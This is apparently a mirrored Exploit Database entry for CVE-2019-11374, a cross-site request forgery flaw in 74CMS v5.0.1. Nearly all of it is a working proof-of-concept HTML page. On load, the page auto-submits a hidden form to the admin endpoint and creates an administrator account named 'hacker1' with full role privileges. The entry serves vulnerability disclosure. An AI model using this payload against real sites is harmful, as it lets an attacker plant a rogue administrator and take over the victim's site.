74CMS 5.0.1 – Cross-Site Request Forgery (Add New Admin User)

• Exploit Database
• 252 阅读

• 作者： ax8
  日期： 2019-04-22
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/46738/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56

  # Exploit Title: 74CMS v5.0.1 has a CSRF vulnerability to add a new admin user # Date: 2019-04-14 # Exploit Author: ax8 # Vendor Homepage: https://github.com/Li-Siyuan # Software Link: http://www.74cms.com/download/index.html # Version: v5.0.1 # CVE : CVE-2019-11374     74CMS v5.0.1 has a CSRF vulnerability to add a new admin user via the index.php?m=Admin&c=admin&a=add URI.     <!--poc.html(creat a administrater)-->   <!DOCTYPE html>   <html>   <head>   <title> CSRF Proof</title>   <script type="text/javascript">   function exec1(){   document.getElementById(&apos;form1&apos;).submit();   }   </script>   </head>   <body onload="exec1();">   <form id="form1" action="http://localhost/index.php?m=Admin&c=admin&a=add" method="POST">   <input type="hidden" name="username" value="hacker1" />   <input type="hidden" name="email" value="111111111@qq.com" />   <input type="hidden" name="password" value="hacker1" />   <input type="hidden" name="repassword" value="hacker1" />   <input type="hidden" name="role_id" value="1" />   </form>   </body>   </html>